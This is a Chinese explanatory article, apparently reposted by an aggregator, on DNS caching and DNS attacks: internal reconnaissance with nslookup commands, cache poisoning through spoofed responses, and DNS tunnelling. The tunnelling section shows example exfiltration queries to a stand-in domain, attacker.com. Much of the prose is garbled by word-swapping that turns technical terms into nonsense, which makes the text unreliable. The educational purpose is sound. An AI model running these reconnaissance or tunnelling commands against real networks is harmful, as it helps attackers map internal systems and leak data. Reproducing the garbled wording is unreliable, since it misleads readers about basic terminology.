DNS系统原理及漏洞利用分析（下）

接上篇《DNS体系道理及裂痕操作说明(上)》

四、DNS缓存

假如每次有任何用户试图会见www.dingxinsec.com.cn，都必需向权限域名处事器提倡对该域名的查询哀求，将会发生大量的收集流量!因此，为了使计较机不消在每一次会见某个域名时都向DNS处事器提倡IP查询哀求，计较机上凡是会存储一个自身的域名-IP映射库，这个映射库被称为“DNS缓存”。

• 加速DNS哀求相应速率
• 镌汰DNS哀求在互联网上占用的带宽

可是，DNS缓存要领也存在一些题目，包罗：

• DNS信息的变革必要必然的时刻才气撒播开——这意味着，全部DNS处事器都将其缓存更新为最新的IP数据之前，每每必要一段时刻
• 进攻者也许操作DNS缓存提倡进攻

DNS缓存有以下几种差异的范例：

• 赏识器DNS缓存：今朝大大都赏识器均内置了DNS缓存成果，行使当地缓存方法实现DNS理会凡是快速且高效。
• 操纵体系(OS)DNS缓存：今朝，大大都用户计较机操纵体系均具备DNS客户端，可用于打点DNS理会和哀求。此类DNS缓存也是当地化的，因此速率快且无需占用带宽。
• 递归理会DNS缓存：每个DNS递归处事器中都有DNS缓存，用于存储可向其提倡下一步哀求的IP。

五、DNS常见裂痕

• 用户内部DNS处事器会存储用户收集域中全部处事器的内部域名与IP，并可以或许在无需身份认证的环境下实验会见。这使得DNS成为进攻者在内网探测阶段的重要信息来历。
• DNS缓存信息并非必然与权限域名处事器同等，进攻者有也许改动DNS缓存，假如用户内网的DNS处事器被进攻改动，则行使该DNS处事器提倡域名会见的计较机就会被拐骗到错误的处事器。
• DNS处事器也许将内网的域名查询从内网事变站递归转发至外网处事器，进攻者也许操作此举动建设表里网之间的“隐通道”来泄漏内网数据。

1. 操作DNS实验探测

一旦进攻者穿透防火墙进入用户内网并节制某台计较机，就可以操作内网的DNS处事查找重要的处事器信息，如邮件处事器、域名处事器等种种有代价的信息。假如进攻者具备足够的技能手段，乃至也许操作内部DNS处事器批量发送用户收集中区的信息，此类进攻被称为“DNS区传输进攻”。

以下给出了在Windows操纵体系情形中实现该进攻的流程：

• 打开呼吁提醒符(ctrl+ esc ➡️输入字母“cmd” ➡️回车)
• 输入“ipconfig”，将看到当前计较机地址的域名、IP地点以及很多其他信息(后续呼吁中将会行使)
• 键入“nslookup[IP]”，，将看到正在相应哀求的DNS处事器名称，假如名称已知，则会表现列着名称和IP地点的DNS记录
• 键入“nslookup-type=soa [当前计较机地址域名]”， 执行此呼吁将返回当前计较机的权限DNS处事器，假如您实行渗出收集，则不会很利便。
• 键入“nslookup-type=MX [当前计较机地址域名]”，通过执行该呼吁，进攻者可以精确获知网内邮件处事器的IP信息。

2. 操作DNS实验流量重定向

当用户实行赏识到某个网站时，他们的计较机遇在DNS处事器中查询该网站的IP。假如DNS处事器中存有该记录的缓存，则将直接返回该IP。假如没有，它会查询“上游”DNS处事器，并将功效中继给最终用户，同时缓存该信息以供下次行使。

在今朝已知的进攻中，进攻者已经可以或许伪造DNS相应信息，使其看起来像是来自正当的DNS处事器。要到达这一方针，进攻者可以操作DNS的三个瑕玷：

• DNS对来自上游处事器的相应仅执行很是弱的认证。相应信息只需包括正确的事宜ID(一个16位二进制数字(0-65536))。究竟证明，要猜出正确的事宜ID，技能难度并不大。
• DNS处事器接管同时相应多个查询哀求，因此进攻者可以或许同时对事宜ID实验多次揣摩(与暴力破解暗码思绪相同)。
• DNS行使的IP毗连很轻易被伪造。这意味着进攻者可以从一台计较机向DNS处事器发送流量，使其看起来像来自另一台计较机，譬喻另一台真实有用的DNS处事器。轻易被伪造的IP毗连范例并不多，不幸的是，DNS刚好是个中之一。

一旦进攻者乐成伪造了DNS相应动静，则其可以实现改动吸取端DNS处事器的缓存。以下就以一个典范的场景声名这一进攻举动也许造成的严峻效果：

假设进攻者相识到用户单元行使外部应用措施来处理赏罚经费等重要事宜。假如进攻者改动了用户单元DNS处事器的相干记录，则可以或许将用户拐骗至进攻者伪造的处事器，拐骗用户在进攻者伪造的登岸页面上录入其账号及口令信息。

更有耐性的进攻者还也许将真实流量转发给真实的处事器(充当“中间人”)，因此用户就不会发明进攻正在产生。获取用户的身份信息后，进攻者可以在其他干系体系上实行行使这些身份信息，可能直接出售这些信息。

3. 操作DNS构建隐通道

假设进攻者已经想法进入了用户单元收集，节制了一台内网计较机，而且已经找到了其想要窃取的要害数据。如安在不留任何陈迹的环境下将数据传输到网外?进攻者也许行使一种被称为“DNS地道”的技能来实现。凡是的做法如下：

(1)进攻者在互联网上配置一个DNS域(如attacker.com)，并建设一个权限域名处事器

(2)在被进攻者节制的主机上，进攻者可以将数据解析为小段并将其插入到一系列DNS查询中，如下所示：

• nslookup My1secret1.attacker.com
• nslookup is1that1I1know.attacker.com
• nsllookup your1data.attacker.com

(3)用户单元的DNS处事器将吸取这些哀求，并将这些哀求转发回attacker.com的权限域名处事器。进攻者在其权限域名处事器吸取到上述流量后，则可以运行措施以提取查询信息的第一部门(.attacker.com前的内容)并将其从头组合，从而将用户网内的数据不留陈迹地传输到网外(此例中传输的数据是“My secret is that I know your data.”)。而用户单元也许永久不会心识到他们的DNS处事器被用于泄漏自身的数据。

六、小结

（编辑：湖南网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!